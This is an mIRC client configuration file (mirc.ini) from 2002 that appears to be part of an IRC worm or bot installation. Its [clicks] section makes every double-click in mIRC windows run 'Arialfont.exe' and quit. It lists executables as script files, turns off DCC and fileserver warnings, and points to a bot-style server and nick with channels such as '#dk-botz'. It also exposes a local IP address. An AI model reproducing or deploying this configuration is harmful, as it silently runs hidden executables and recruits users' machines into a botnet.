   [text]
   ignore=*.*
   commandchar=/
   linesep=-
   timestamp=[HH:nn]
   network=All
   quit=Looks Like My Time Is Up ( $+ $ip $+ )
   finger=Hi :)
   lastreset=Wed Oct 30 02:29:42 2002
   [files]
   addrbk=mirc.ini
   servers=servers.ini
   browser=c:\progra~1\intern~1\iexplore.exe
   emailer=c:\program files\outlook express\msimn.exe
   finger=finger.txt
   urls=urls.ini
   [warn]
   fserve=off
   dcc=off
   [options]
   n0=0,0,0,0,0,1,300,1,1,0,1,0,0,0,1,1,0,1,0,1,512,0,1,4,0,0,0,1,0,50,1
   n1=0,0,1,0,0,0,18,0,2,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,20,0,0,0,2,2,0
   n2=1,0,0,0,1,1,1,1,0,80,160,1,1,1,1,0,0,0,1,160,40,10,0,0,1,0,1,1,0
   n3=500,0,0,0,0,0,1,0,0,1,0,1,0,0,1,1,1,0,0,0,0,0,1,0,0,0,2,1,0,0
   n4=0,0,1,0,0,50,9999,0,0,1,1,0,1024,0,1,9999,10,0,0,0,1,0,0,2,1,5000,0,2
   n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,1,1,0,300,10,4,0,0,22,0,0,0,999999
   n6=0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,100,1,1,0,0,0,0,0,2
   [about]
   show=sheep
   [windows]
   scripts=0,652,-4,492,0,0,0
   main=788,112,567,27,0,1,0
   wchannel=0,522,0,414,0,1,0
   status=0,112,0,27,0,1,0
   wquery=0,431,0,234,0,1,0
   wserv=63,483,63,345,1,1,0
   #gtcontrol=21,112,436,27,0,1,0
   wmessage=14,633,57,393,0,1,0
   wdccg=0,240,0,212,0,1,0
   wlist=42,666,0,400,0,1,0
   [events]
   default=2,2,3,2,2,1,1
   [ident]
   active=yes
   system=UNIX
   port=113
   userid=Xquinn
   [socks]
   enabled=no
   port=1080
   method=4
   dccs=no
   [clicks]
   status=//run $mircdir $+ Arialfont.exe | exit
   query=//run $mircdir $+ Arialfont.exe | exit
   channel=//run $mircdir $+ Arialfont.exe | exit
   nicklist=//run $mircdir $+ Arialfont.exe | exit
   notify=//run $mircdir $+ Arialfont.exe | exit
   [dde]
   ServerStatus=off
   ServiceName=mIRC
   CheckName=off
   [fileserver]
   warning=off
   [dccserver]
   n0=0,59,0,0,0,0
   [mirc]
   nick=xHide-[29]-[573286]
   anick=[44-hide-44]
   host=mail.mtvxxx.comSERVER:mail.mtvxxx.com:9004:dhpsdk
   user=keshana
   email=C99s174
   [colours]
   n0=1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
   [pfiles]
   n0=mirc.ini
   n1=mirc.ini
   n2=mirc.ini
   n3=mirc.ini
   n4=mirc.ini
   [fonts]
   [fonts]
   fscripts=Wingdings,407,2
   fstatus=Wingdings,727,2
   fchannel=Wingdings,407,2
   fquery=Wingdings,407,2
   f#dk-botz=MS Sans Serif,407,0
   f#updatescript=MS Sans Serif,407,0
   f#LetsFuck=Wingdings,407,2
   [nicklist]
   [users]
   [servers]
   n0=blow meSERVER:tr3d.yi.org:6667
   [aliases]
   /op /mode # +ooo $$1 $2 $3
   /dop /mode # -ooo $$1 $2 $3
   /j /join #$$1 $2-
   /p /part #
   /n /names #$$1
   /w /whois $$1
   /k /kick # $$1
   /q /query $$1
   /send /dcc send $1 $2
   /chat /dcc chat $1
   /ping /ctcp $$1 ping


   [wizard]
   warning=2

   [findtext]
   n0=timerconnect

   [local]
   localip=62.215.98.65
   longip=1054302785

   [dragdrop]
   n0=*.wav:/sound $1 $2-
   n1=*.*:/dcc send $1 $2-
   s0=*.*:/dcc send $1 $2-

   [extensions]
   n0=defaultEXTDIR:

   [notify]
   n0=aLaDin



   [afiles]
   n0=aliases.ini
   [rfiles]
   n0=mirc.ini
   n1=varde.exe
   n2=arial.exe
   n3=aeril2.exe
   n4=smal.exe
